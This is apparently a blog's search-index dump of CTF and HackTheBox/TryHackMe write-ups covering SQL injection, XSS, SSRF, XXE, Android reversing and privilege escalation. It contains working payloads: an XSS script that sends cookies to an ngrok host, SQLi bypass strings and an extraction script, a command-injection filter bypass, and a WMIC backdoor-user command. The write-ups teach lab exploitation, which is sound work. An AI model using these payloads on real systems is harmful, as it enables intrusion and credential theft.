690, 420 image = Image.new(\u0026#34;RGBA\u0026#34;, (width, height), (255, 255, 255, 0)) # Step 2: Modify Pixel Colors image.putpixel((412, 309), (52, 146, 235, 123)) image.putpixel((12, 209), (42, 16, 125, 231)) image.putpixel((264, 143), (122, 136, 25, 213)) # Step 3: Save the Image image.save(\u0026#34;created_image.png\u0026#34;) if __name__ == \u0026#34;__main__\u0026#34;: create_and_modify_image()   you also have to run the following command to set the exit data\n1 2 3  exiftool -PNG:Description=\u0026#34;jctf{not_the_flag}\u0026#34; -PNG:Title=\u0026#34;kool_pic\u0026#34; -PNG:Author=\u0026#34;anon\u0026#34; created_image.png    Roks This challenge was obviously an lfi\nphp urldecode() only decodes once i.e it only decodes one layer , so if i encode on several layers i can bypass the filter which only decoded 2 layers\nthe flag was at ../../../../flag.png according to the dockerfile , urlencode this 3 times and send it to get the flag\n Login This challenge tested knowledge in sql and bcrypt hashing.\nUsing sqlmap you could extract the database table users and data\n1 2 3 4 5  pwhash,username $2y$10$vw1OC907/WpJagql/LmHV.7zs8I3RE9N0BC4/Tx9I90epSI2wr3S.,guest $2y$10$Is00vB1hRNHYBl9BzJwDouQFCU85YyRjJ81q0CX1a3sYtvsZvJudC,admi   the hashes are clearly bcrypt\nto login as admin we can use the following sql statement. I got it from \u0026raquo; here . Here we can set our own bcrypt hash which we have knowledge of the password.\n1 2 3 4 5 6  xxx\u0026#39; UNION SELECT \u0026#39;admin\u0026#39; AS username,\u0026#39;$2y$10$C4lfi0f8kouggVBFkKF1ru./NEQTKqptjJCh6JI/hJieELWHLeFXi\u0026#39; AS pwhash-- and the password as \u0026#34;a\u0026#34;   Here we get the magic , in my case it was \u0026ldquo;688a35c685a7a654abc80f8e123ad9f0\u0026rdquo;\nIn the code if we supply the magic as a get parameter the flag will be appended to the password , Bcrypt has a character limit of 72 , so if we set a password of more than 72 characters it will be truncated and only the first 72 characters will be hashed as the password . I had seen technique in an ippsec video recently https://www.youtube.com/watch?v=E5TOeiCnGkE\u0026amp;t=3183s , Luckyme :)\nAnyways here is the exploit \u0026raquo; here\nflag : ictf{why_are_bcrypt_truncating_my_passwords?!}\n ","date":"2023-07-23T12:41:18+03:00","image":"https://f0rk3b0mb.github.io/cover/imaginary_ctf.jpg","permalink":"https://f0rk3b0mb.github.io/p/imaginaryctf2023/","title":"ImaginaryCTF2023"},{"content":"Wireshark packet analysis (basic) To demonstrate this, I will be analyzing a pcap from bicWC. You can also download this pcap and follow along \u0026raquo; here.\nYou can also download this \u0026raquo; here. I will use this pcap to demonstrate how to extract files from captured network traffic.\nDEMO 1  How many packets have been captured?\nThe number of packets is shown at the right bottom of the screenshot above: 1309\n What is the IP address of the attacker?\nHere we will use the TCP filter in Wireshark as shown below:\nThe IP address is 45.15.156.72\n Which city is the IP address based in?\nWe will use an online IP locator tool:\nThe city is Amsterdam\n How many DNS servers are in the pcap?\nHere we just use the DNS filter in Wireshark:\nThe answer is two. There is one with IP xxx.100 and xxx.101\n What is the IP of the NTP server?\nHere we will use the NTP filter in Wireshark:\nThe IP address, as you can see above, is 51.145.123.29\n What machine ID was transmitted to the attacker?\nHere we will follow the TCP stream of one of the requests to the attacker as shown below. This time we will use the IP address filter \u0026lt;ip.addr == 45.15.156.72\u0026gt;:\nThe machine ID is a parameter of the POST request.\n What is the user-agent?\nAs you can see from the picture above, the user-agent is \u0026ldquo;x\u0026rdquo;\n What was the MAC address of the compromised machine?\nWe just have to double click on one of the TCP packets between the attacker and compromised machine as shown below. The MAC address is on the blue line I have highlighted:\n What email address is the registrar of the IP address?\nHere we will conduct a WHOIS search on the IP address. To make it even easier, we will combine it with a grep filter for the @ symbol, which is used in email addresses:\n DEMO 2 Scrolling through the pcap, you can see weird filenames ending in .ts. I googled this and found out that it is a file extension for video files.\nTo extract files, you will first have to identify the stream of the files you want to extract. In this case, it\u0026rsquo;s stream 3. Select packet \u0026gt; right click \u0026gt; follow TCP stream.\nYou can move through subsequent streams by using the stream buttons:\nYou now have to export the stream to a file. In my case, I called the file filtered.pcapng:\nOpen the filtered.pcapng in Wireshark. Go to File \u0026gt; Export Objects \u0026gt; HTTP:\nYou can click on each and then save. The resulting files can be opened with any video player. The flag is in WyK2SW5mcYDArna2IlwZ4C4SwDjZ717a5.ts.\n The above challenges are a good entry to learning to use Wireshark and understanding networking.\n","date":"2023-07-14T11:47:02+03:00","image":"https://f0rk3b0mb.github.io/cover/5613.jpg","permalink":"https://f0rk3b0mb.github.io/p/packet-analysis-using-wireshark/","title":"Packet analysis using Wireshark"},{"content":"Nahamcon CTF 2023 writeups warmups  blobber Thic challenge had a downloadable part , the file was a sqlite database.\nI opened the file using sqlite database browser\nbrowsing the data there is only gibberish , except on line 238 where data is a blob object.Blobs in sqlite is whereby files can be addedtto database as entries. Read more here\nwe can use this sql statement to get the blob\n1 2 3  select data from blobber where id=238   Then save it to a file , the resulting file in is a bzip2 archive, extracting , you get an image of the flag\n ninety one In this challenge you are provided with an encoded string\n1  @iH\u0026lt;,{|jbRH?L^VjGJH\u0026lt;vn3p7I,x~@1jyt\u0026gt;x?,!YAJr*08P   I used this tool \u0026raquo; here to analyse and decode it , it was encrypted using base91 encoding\n1 2  flag{dfb88c7d9ca38e71dc27e1072fc43d1b}    glasses  This challenge you were provided with a webpage. It had no functionality, based on the title of the challenge it is obvious that we nee to find something hidden.\nLokking through the source I found obfuscated js code. You can use this tool \u0026raquo; here to deobfuscate it . It returns html code the with the flag\n1 2 3  flag{8084e4530cf649814456f2a291eb81e9}    web category  starwars  In this challenge you are provided with a web endpoint that allows you to signup and login The goal is to login as admin , you can also comment and the admin reviews your comment , obvoiusly it is classic xxs\nthis below is the payload i used . it fetches my ngrok endpoint with the cookie appanded at the end. I dont know if the first part was necessary , I generated it by trial and error and it worked\n1 2 3 4 5 6 7  \u0026#34;\u0026gt;\u0026lt;script\u0026gt; var iframe = document.body.appendChild(document.createElement(\u0026#39;iframe\u0026#39;)); iframe.style.cssText = \u0026#39;height: 500px; width: 100%\u0026#39;; iframe.src = \u0026#39;http://challenge.nahamcon.com:30467/signup\u0026#39;; iframe.onload = function() { fetch(\u0026#39;http://f910-102-167-145-177.ngrok-free.app?iframeContents=\u0026#39; + btoa(window.document.cookie), { method: \u0026#39;GET\u0026#39; }).then(response =\u0026gt; response.json()).then(data =\u0026gt; console.log(data)).catch(error =\u0026gt; console.error(error)); };\u0026lt;/script\u0026gt;   the flag will be returned in base64 format. Use it in the browser to access /admin page and the flag\n misc category  zombies  In this challenge you were provided with an ssh endpoint to connect to\nreading the file .user-entrypoint.sh\nnohup is enables a program to run even after a terminal window is closed , if you check running processes you can see that tail is still running. Running processes usually have the activities stored in /proc directory. in the image below 11 is the pid of the tail process\nmobile category  This challenge requires a set of tools to be able to do anything :\ndex2jar\njdgui\nghidra\ngenymotion \u0026laquo; android emulator on pc\nadb\napktools\njninjaspeak  In this challnge you are provided with an apk file , you can install it on genymotion using adb, it is a simple prompt that converts input to jninjaspeak.\n1 2  adb install jninjaspeak.apk   Decompile the application using apktool\n1 2 3 4  use : apktool -r -s d jninjaspeak.apk   We use -r -s flags to tell apktool not to decompile the dexfiles to smali which it does by default.\nConvert the dex files to jar using dex2jar to be able to view the source using jdgui.\nIn the mainactivity we see that the program needs libjninjaspeak.so liblary that is used to translate the input.\nHere we use ghidra to reverse engineer the liblary , the liblary is in the /lib in the folder apktool generated.\nIn ghidra , in the main function of the liblary we find the flag\nflag{1f539e4a706e6181dae9db3fad6a78f1}\n Fortune teller  For this challenge follow the above steps to install and decompile the application and convers dex files to jar.\nThe mainactivity function in located the classes3.dex. Looking closely you can see that the application uses our input as a key to decrypt an encrypted file , the encryption used is AES.\nThe file is decrypted in the decrypt.class. Where our input is used in the SecretKeySpec object.\nBased on my simple java programming undertanding :) there is a variable called correctString that is initialized in the main function.\nIt is followed by its getter function\nand then tracing it we find the setter function\nIt sets correctString to the value by resource id 2131755048 . Resource ids can be traced what that point to in the classes2.dex, path is shown below\nIt is point to a string , the resorces can be found the /res folder since the value is a string we goto /res/values and cat strings.xml.\nThe key is \u0026ldquo;you won this ctf\u0026rdquo; , enter it and get the flag\n wheres waldo  In this challenge you are provided with an apk file , follow the steps above to decompile it and open the sources in jd gui and install it in the emulator.\nThis application is some type of maps applcation so the objective is to find the location of waldo in the map.\nAnalysing the mainactivity function you can see thet the application is making a request to an endpoint which determines id we have found waldo and the distance from him\nThe objective is to set longitude and latitude that results on the off_by value to result to zero as you can see below\n1 2 3 4 5  mapView1.getController().setCenter((IGeoPoint)new GeoPoint(location.getLatitude(), location.getLongitude())); Request request = (new Request.Builder()).url(\u0026#34;http://challenge.nahamcon.com:30001/location?lat=\u0026#34; + location.getLatitude() + \u0026#34;\u0026amp;long=\u0026#34; + location.getLongitude()).build(); Response response = (new OkHttpClient()).newCall(request).execute();   the code above takes the off_by and calculates the distance from waldo by miles.\nI scripted this python program to do all the hardwork (at least).\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29  import requests def calculate_distance(latitude, longitude): url = f\u0026#39;http://challenge.nahamcon.com:30001/location?lat={latitude}\u0026amp;long={longitude}\u0026#39; print(url) # Replace with the actual API endpoint response = requests.get(url) print(response.text) data = response.json() off_by = data.get(\u0026#34;off_by\u0026#34;) i = off_by print(i) return(i) def move(): pos=list() for x in range(-180,180,30): for y in range(0,30,2): dis=calculate_distance(y,x) pos.append(list) print(pos) move()   The code above i used to be able to narrow down on which coordinated produces the least distance from waldo\n1 2 3 4 5  lat=30\u0026amp;long=-60 low 1099.613580066382 this was the lowest   from here i entered the values manually by trying raising the value higher or lower and chacking the changes in the distance\nat lat=40.60 and long -74.67 we needed to go even smaller units so i researched and found out that api use the following format to show distance\n1 2 3 4 5  Latitude: ±DD.DDDDDD Longitude: ±DDD.DDDDDD where D is any number between 1-9   final position lat=40.583333 and long=-74.67\n","date":"2023-06-15T20:58:33+03:00","permalink":"https://f0rk3b0mb.github.io/p/nahamcon2023/","title":"Nahamcon2023"},{"content":"htb pc writeup category: web\ndifficulty: easy\nHello, and welcome to another walkthrough of a htb machine.\nWhen you run a port scan on the target we get port 22 open , a full port scan reveals port 50015 that nmap cannot tell the service which it is running\n1 2 3  open port 22 open port 50015   a little reserarch i found out that the service is grpc \u0026raquo; for more datails of what it is here\nTo interect with grpc we need some tools one of them is called grpcurl and there is also grpcui\nThey are golang application so you need to have goland installed on your machine.\nIn this procudure i am going to use grpcui , the difference between the two is one has ui and the other is cli.\nwe create a new user test:test, we login in and are given a jwt token. I f we make a request to the getinfo() we receive response as shown below.\nThere is an id field we can try different ids and it returns an error , if you append a single quot it returns a format error , this is a good indicator of sqli.\n1 2  \u0026#34;message\u0026#34;: \u0026#34;Unexpected \\u003cclass \u0026#39;TypeError\u0026#39;\\u003e: bad argument type for built-in operation\u0026#34;   I saved the request in a file and fired up sqlmap\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21  POST /invoke/SimpleApp.getInfo HTTP/1.1 Host: 127.0.0.1:41553 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/113.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json x-grpcui-csrf-token: ceu1ZeLii2J61yGbIh69ZsqYUUhVJ9vURydGc1b27KY X-Requested-With: XMLHttpRequest Content-Length: 190 Origin: http://127.0.0.1:41553 Connection: close Referer: http://127.0.0.1:41553/ Cookie: wp-settings-1=libraryContent%3Dbrowse; _grpcui_csrf_token=ceu1ZeLii2J61yGbIh69ZsqYUUhVJ9vURydGc1b27KY Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin {\u0026#34;metadata\u0026#34;:[{\u0026#34;name\u0026#34;:\u0026#34;token\u0026#34;,\u0026#34;value\u0026#34;:\u0026#34;eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdCIsImV4cCI6MTY4NjMyMTkzMX0.L624cRHm_TXyUSDTBU14H82b2DNq44JacxN9XfT1cKU\u0026#34;}],\u0026#34;data\u0026#34;:[{\u0026#34;id\u0026#34;:\u0026#34;1*\u0026#34;}]}   I added * next to the id number to tell sqlmap to test that field . NOTE: if you dont do this sqlmap will run tests on the outer json only.\nHere are the tables and data of table accounts\n1 2 3 4 5 6 7 8 9 10 11 12 13  +----------+ | accounts | | messages | +----------+ +------------------------+----------+ | password | username | +------------------------+----------+ | admin | admin | | HereIsYourPassWord1431 | sau | +------------------------+----------+   We can login to ssh as the user sau. The we read user.txt\n I uploaded linpeas.sh to the target and ran it , I found out that there was a webserver listening on port 127.0.0.1:8000. To access it on our machine we can use a technique known as ssh port forwarding.\n1 2 3 4 5 6  Here is the command ssh -L 8000:localhost:8000 sau@10.10.11.214 It will map port 8000 on the server to port 8000 locally   Visiting the url we find out it is a login page of pyload. Since we dont have login creds , I searched for exploits aganist pyload and luckily there is an unathenticated rce.\nI used this exploit to understand more on how i works , here.\nRunning the exploit we get are root :() and we can read root.txt.\n REFERENCES for gprc and other ways to expoit it:\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-1-c0059362c4b5\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-2-b1fd38f8cd88\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-3-c92f3b687dd9\nhttps://medium.com/@ibm_ptc_security/grpc-security-series-part-4-f1c260bbb00a\n","date":"2023-06-09T17:22:15+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb-pc/","title":"HTB PC"},{"content":"HTB monitortwo writeup categoty : web\ndifficulty : easy\nAs always we begin with a port scan\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17  Starting Nmap 7.80 ( https://nmap.org ) at 2023-06-02 12:45 EAT Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan Connect Scan Timing: About 56.80% done; ETC: 12:46 (0:00:15 remaining) Nmap scan report for 10.10.11.211 Host is up (0.28s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Login to Cacti Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 53.63 seconds   As you can see there is a web interface , it is a login page and it utilizes something called cacti version 1.2.22\nUsing searchsploit :\nrunning the exploit, BOOM!! we get a reverse shell\n Looking around there is nothing really interesting , i ran linpeas and all i could find was a suid binary called capsh , you can check out how to exploit it here\nbut there was nothing in the root folder , turns out we were in a docker container that ran the webserver.The file that caught my attention was entrypoint.sh in the root folder.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19  #!/bin/bash set -ex wait-for-it db:3306 -t 300 -- echo \u0026#34;database is connected\u0026#34; if [[ ! $(mysql --host=db --user=root --password=root cacti -e \u0026#34;show tables\u0026#34;) =~ \u0026#34;automation_devices\u0026#34; ]]; then mysql --host=db --user=root --password=root cacti \u0026lt; /var/www/html/cacti.sql mysql --host=db --user=root --password=root cacti -e \u0026#34;UPDATE user_auth SET must_change_password=\u0026#39;\u0026#39; WHERE username = \u0026#39;admin\u0026#39;\u0026#34; mysql --host=db --user=root --password=root cacti -e \u0026#34;SET GLOBAL time_zone = \u0026#39;UTC\u0026#39;\u0026#34; fi chown www-data:www-data -R /var/www/html # first arg is `-f` or `--some-option` if [ \u0026#34;${1#-}\u0026#34; != \u0026#34;$1\u0026#34; ]; then set -- apache2-foreground \u0026#34;$@\u0026#34; fi exec \u0026#34;$@\u0026#34;   As you can see , we can use that format to run mysql statements.I used the following to dump users in the user_auth table.\n1 2  mysql --host=db --user=root --password=root cacti -e \u0026#34;SELECT * FROM user_auth\u0026#34;   We get that there are 3 user accounts, admin, guest and marcus and their password hashes.I saved the hashes to a file and let john-the-ripper do its thing.\nI tried logging in the webpage but i got access denied and then tried ssh login as marcus, BOOM!! i am now marcus.\nWe can read the user.txt in the home folder\nI tried running linpeas again but still got nothing , also checked suid binaries but still nothing , at this point i did not know what to do.\nI got a hint that there was a docker vulnerability that resulted in privilledge escalation , you can read more and get the exploit here CVE-2021-41091\nFor this exploit to work you will utilize the capsh privesc we had discovered earlier in the reverse shell to set the \u0026ldquo;chmod u+s bash\u0026rdquo; .\nthen we execute the bash binary above as the in the marcus ssh session, BOOM!! root baby!!\nGoodbye ;)\n","date":"2023-06-02T16:31:02+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/htb-monitortwo/","title":"HTB Monitortwo"},{"content":"check it out on my github \u0026raquo; here\n","date":"2023-05-31T13:03:23+03:00","permalink":"https://f0rk3b0mb.github.io/p/bic-winter-con-2023/","title":"Bic winter con 2023"},{"content":"check it out on my github \u0026raquo; here\n","date":"2023-05-31T12:59:47+03:00","image":"https://f0rk3b0mb.github.io/cover/ca-logo-2023.webp","permalink":"https://f0rk3b0mb.github.io/p/htb-cyberapocalypse-2023/","title":"htb cyberapocalypse 2023"},{"content":"xee1 category: web\nsolution From the title you can tell this is a classic xxe challenge , when you capture the login request in burp repeater you will realize that the username is echoed out , so we have to make sure the output of our xxe payload is reflected in the page through the user name field.\nI crafted a payload to read /flag.txt , we also need to pass it through a php filter , we get the flag in base64 format\nxee2 category: web\nsolution This challenge is a subsequent of xxe2 but required a more complex approach, this time we have to receive the flag remotely since our user input is not being reflaected in the site , this is known as blind xxe . You can read more about it here\nso after some research i created thhis payload that reads the /flag.txt and sends it to a ngrok endpoint, ps we also have to pass read the flag through a php filter\nI get a hit and we can decode the flag from base64 as shown below\nBing category: web\nsolution This was a little complicated , i saw it as more of a bash jail than a web challenge.\nBasically you wegiven a simple site with page that would serve the flag, there was clearly command injection , cince you could run the i command. There was also a poor attempt at a regex filter at the frontend so this challnge could only be solved using burp.\nfile reading commands like cat were blocked also spaces , so you had to try any command you knew to read a file. Heres the solution:\n\u0026lsquo;head$IFS/fl??.txt|rev\u0026rsquo;\nwithout the rev the page will not display there may be a flag filter , so we reverse it\n","date":"2023-05-21T12:44:03+03:00","image":"https://f0rk3b0mb.github.io/cover/deadsec.jpeg","permalink":"https://f0rk3b0mb.github.io/p/deadsec-2023/","title":"Deadsec 2023"}]
\ No newline at end of file
+[{"content":"Writeup for challenges in knightctf 2024\nweb kitty Tetanus is a serious, potentially life-threatening infection that can be transmitted by an animal bite.\nN:B: There is no need to do bruteforce.\nHere its obvious that it is sqli , login bypas to be precise\n1 2  payload: \u0026#34; or 1=1-- -   since it was in json we you had to excape the first double-quote\n README This challenge entailed bypass a 403 response to be able to read the flag. The methos to exploit this is by using special http headers. see here\nUsing burp intruder , we get the flag\n Gain access 1 For this challenge we are given a login page. It obvious the vuln is login bypass.\nInspecting the page source code we can see a comment with the root email \u0026ldquo;root@knightctf.com\u0026rdquo;\n1 2  payload : root@knightctf.com\u0026#39;-- -    Gain access 2 For this challnege we are also given a login page. Viewing the page source we can see a comment that indicated there is a path notesssssss.txt. Visiting it\u0026hellip;\n1 2 3  I\u0026#39;ve something for you. Think..... root@knightctf.com:d05fcd90ca236d294384abd00ca98a2d   The hash is md5 since it has a length of 32. Using this \u0026raquo; site we find the password as \u0026ldquo;letmein_kctf2024\u0026rdquo;\nLogging in we get a OTP verification page. It is vulnerable to sqli\n1 2  payload : anything\u0026#39; or 1=1-- -   We then get access to the dashboard\nI got stuck here , will update when the ctf ends. :)\n Networking For the networking challs check out my teammates writeups on them \u0026raquo;\u0026gt;\nhere  ","date":"2024-01-20T22:14:59+03:00","permalink":"https://f0rk3b0mb.github.io/p/knightctf_2024/","title":"Knightctf_2024"},{"content":"Whats my password solve script category : web difficulty: easy\nVulnerability is error based blind sqli\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29  import requests import string import json url=\u0026#34;http://whats-my-password-web.chal.irisc.tf/api/login\u0026#34; #found_char=[\u0026#39;i\u0026#39;, \u0026#39;r\u0026#39;, \u0026#39;i\u0026#39;, \u0026#39;s\u0026#39;, \u0026#39;c\u0026#39;, \u0026#39;t\u0026#39;, \u0026#39;f\u0026#39;, \u0026#39;{\u0026#39;, \u0026#39;m\u0026#39;, \u0026#39;y\u0026#39;, \u0026#39;_\u0026#39;, \u0026#39;p\u0026#39;, \u0026#39;4\u0026#39;, \u0026#39;2\u0026#39;, \u0026#39;2\u0026#39;,\u0026#39;W\u0026#39;, \u0026#39;0\u0026#39;, \u0026#39;R\u0026#39;, \u0026#39;D\u0026#39;, \u0026#39;_\u0026#39;, \u0026#39;1\u0026#39;, \u0026#39;S\u0026#39;, \u0026#39;_\u0026#39;, \u0026#39;S\u0026#39;, \u0026#39;Q\u0026#39;, \u0026#39;l\u0026#39;, \u0026#39;1\u0026#39;,\u0026#39;}\u0026#39;] found_char=[] headers={\u0026#34;Content-Type\u0026#34;:\u0026#34;application/json\u0026#34;} def main(): for x in range(len(found_char),50): for i in string.printable[:-6]: username = \u0026#34;skat\u0026#34; password = f\u0026#34;\\\u0026#34;or 1=(IF(SUBSTR((SELECT password from users where username=\u0026#39;skat\u0026#39;),{x},1)=\u0026#39;{i}\u0026#39;, 1,2))-- -\u0026#34; data = {\u0026#34;username\u0026#34;: username, \u0026#34;password\u0026#34;: password} sdata=json.dumps(data) r=requests.post(url,data=sdata,headers=headers) if \u0026#34;root\u0026#34; in r.text: found_char.append(i) print(found_char) break main()   flag: irisctf{my_p422W0RD_1S_SQl1} ","date":"2024-01-06T18:29:32+03:00","image":"https://f0rk3b0mb.github.io/cover/iris.png","permalink":"https://f0rk3b0mb.github.io/p/irisctf_whats_my_password/","title":"Irisctf_whats_my_password"},{"content":"Thm Investigating with splunk This room is for pactice on the Jnuior Penetration tester path on TryHackMe \u0026raquo;\u0026gt; here\n How many events were collected and Ingested in the index main?  1 2 3  index=\u0026#34;main\u0026#34; ans: 12256   On one of the infected hosts, the adversary was successful in creating a backdoor user. What is the new username?  1 2 3 4  index=main EventID=\u0026#34;4720\u0026#34; ans: A1berto   On the same host, a registry key was also updated regarding the new backdoor user. What is the full path of that registry key?  1 2 3 4 5  index=main Hostname=\u0026#34;Micheal.Beaven\u0026#34; EventID=\u0026#34;12\u0026#34; A1berto ans : HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\A1berto   Examine the logs and identify the user that the adversary was trying to impersonate.  1 2 3 4 5 6 7  The attacker account is called A1berto the real account is Alberto with an \u0026#39;L\u0026#39; index=main (User section) ans : Alberto   What is the command used to add a backdoor user from a remote computer?  1 2 3 4 5 6  index=main EventID=\u0026#34;4688\u0026#34; ans: \u0026#34;C:\\windows\\System32\\Wbem\\WMIC.exe\u0026#34; /node:WORKSTATION6 process call create \u0026#34;net user /add A1berto paw0rd1\u0026#34;   How many times was the login attempt from the backdoor user observed during the investigation?  1 2 3 4 5 6 7 8  index=main EventID=\u0026#34;4624\u0026#34; \u0026lt;\u0026lt; succesful logon\u0026gt;\u0026gt; index=main EventID=\u0026#34;4625\u0026#34; \u0026lt;\u0026lt;unsuccesful logon\u0026gt;\u0026gt; both return no results ans : 0   What is the name of the infected host on which suspicious Powershell commands were executed?  1 2 3 4  index=main powershell ans : James.browne   PowerShell logging is enabled on this device. How many events were logged for the malicious PowerShell execution?  1 2 3 4  index=main EventID=\u0026#34;4103\u0026#34; ans: 79   An encoded Powershell script from the infected host initiated a web request. What is the full URL?  1 2 3 4 5 6 7 8  from question 7 check the first event base64 decode and use decode text utf-16le using cyberchef. The url is base64 encoded . Youll also have to defang the url ans: hxxp[://]10[.]10[.]10[.]5/news[.]php   ","date":"2023-12-03T11:56:27+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_splunk/","title":"Thm_splunk"},{"content":"Wazuh This is a writeup of Wazuh module on tryhackme. This is in the SOC Level 1 path. \u0026raquo; here ENjoy :)\nWazuh is an opensource XDR and SIEM service\nIntro 1 2 3 4 5 6 7 8 9 10 11 12 13 14  1. When was Wazuh released? 2015 2. What is the term that Wazuh calls a device that is being monitored for suspicious activity and potential security threats? agent 3. Lastly, what is the term for a device that is responsible for managing these devices? manager   Wazuh agents 1 2 3 4 5 6 7 8 9  1. How many agents does this Wazuh management server manage? 2 2. What are the status of the agents managed by this Wazuh management server? disconnected   Wazuh Vulnerability Assessment \u0026amp; Security Events 1 2 3 4  1. How many \u0026#34;Security Event\u0026#34; alerts have been generated by the agent \u0026#34;AGENT-001\u0026#34;? 196   Collecting Windows Logs with Wazuh 1 2 3 4 5 6 7 8 9  1. What is the name of the tool that we can use to monitor system events? sysmon 2. What standard application on Windows do these system events get recorded to? event viewer   Collecting Linux Logs with Wazuh 1 2 3 4  1. What is the full file path to the rules located on a Wazuh management server? /var/ossec/ruleset/rules   Auditing Commands on Linux with Wazuh 1 2 3 4 5 6 7 8 9 10  1. What application do we use on Linux to monitor events such as command execution? auditd 2. What is the full path \u0026amp; filename for where the aforementioned application stores rules? /etc/audit/ruled.d/audit.rules   Wazuh API 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20  1. What is the name of the standard Linux tool that we can use to make requests to the Wazuh management server? curl 2. What HTTP method would we use to retrieve information for a Wazuh management server API? GET 3. What HTTP method would we use to perform an action on a Wazuh management server API? PUT 4. Use the API console to find the Wazuh server\u0026#39;s version. v4.2.5   Generating Reports with Wazuh 1 2 3 4 5  1. Analyse the report. What is the name of the agent that has generated the most alerts? agent-001   ","date":"2023-11-25T08:48:38+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_wazuh/","title":"Thm_wazuh"},{"content":"Hackthebox - Hack the boo 2023 writeup  HauntMart Category: web Rating: Easy\nThis challenge had a downloadable part , it was a web applicatio that allowed a user to register and login and add a product.\nTo get the flag we have to login as admin.\nThe is a /addAdmin route but it only accepts requests from localhost\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15  @api.route(\u0026#39;/addAdmin\u0026#39;, methods=[\u0026#39;GET\u0026#39;]) @isFromLocalhost def addAdmin(): username = request.args.get(\u0026#39;username\u0026#39;) if not username: return response(\u0026#39;Invalid username\u0026#39;), 400 result = makeUserAdmin(username) if result: return response(\u0026#39;User updated!\u0026#39;) return response(\u0026#39;Invalid username\u0026#39;), 400   I Tries using X-Forwarded-For headers but it didnt work.\nIf you look closer at the code there is a function to send a request to fetch the manual from a url.\nThis vulnerability is called ssrf (server side request forgery) check more \u0026raquo;\u0026gt; here\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18  def downloadManual(url): safeUrl = isSafeUrl(url) if safeUrl: try: local_filename = url.split(\u0026#34;/\u0026#34;)[-1] r = requests.get(url) with open(f\u0026#34;/opt/manualFiles/{local_filename}\u0026#34;, \u0026#34;wb\u0026#34;) as f: for chunk in r.iter_content(chunk_size=1024): if chunk: f.write(chunk) return True except: return False return False   There is also a poor attempt of a filter for the url\n1 2 3 4 5 6 7 8 9 10  blocked_host = [\u0026#34;127.0.0.1\u0026#34;, \u0026#34;localhost\u0026#34;, \u0026#34;0.0.0.0\u0026#34;] def isSafeUrl(url): for hosts in blocked_host: if hosts in url: return False return True   We can easily bypass this , there are many routed to localhost other that the ones listed there. You can check them out \u0026raquo;\u0026gt; here\nFor me this one worked:\nNOTE: you can get the port that the app is listenig from in therun.py , we have to make a request to /api/addAdmin to make our user admin\n1 2 3 4  http://127.0.1.3:1337/api/addAdmin?username=test   We get the flag as : HTB{A11_55RF_5C4rY_p4tch_3m_411!}\n ","date":"2023-10-27T08:52:15+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/hack_the_boo2023/","title":"Hack_the_boo2023"},{"content":"Thm owasp  Command Injection Practical 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40  What strange text file is in the website root directory? cmd: ls drpepper.txt How many non-root/non-service/non-daemon users are there? What user is this app running as? cmd: whoami www-data What is the user\u0026#39;s shell set as? What version of Ubuntu is running? cmd: lsb_release -a 18.04.4 Print out the MOTD. What favorite beverage is shown? cmd: cat /etc/update-motd.d/00-header DR PEPPER   Broken Authentication Practical 1 2 3 4 5 6 7 8 9 10 11 12 13 14  What is the flag that you found in darren\u0026#39;s account? fe86079416a21a3c99937fea8874b667 What is the flag that you found in arthur\u0026#39;s account? d9ac0f7db4fda460ac3edeb75d75e16e   Sensitive Data Exposure 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27  What is the name of the mentioned directory? /assets Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data? webapp.db Use the supporting material to access the sensitive data. What is the password hash of the admin user? 6eea9b7ef19179a06954edd0f6c05ceb Crack the hash. What is the admin\u0026#39;s plaintext password? qwertyuiop Login as the admin. What is the flag? THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}   XML External Entity 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19  What is the name of the user in /etc/passwd falcon Where is falcon\u0026#39;s SSH key located? /home/falcon/.ssh/id_rsa What are the first 18 characters for falcon\u0026#39;s private key MIIEogIBAAKCAQEA7b   Broken Access Control (IDOR Challenge) 1 2 3 4 5 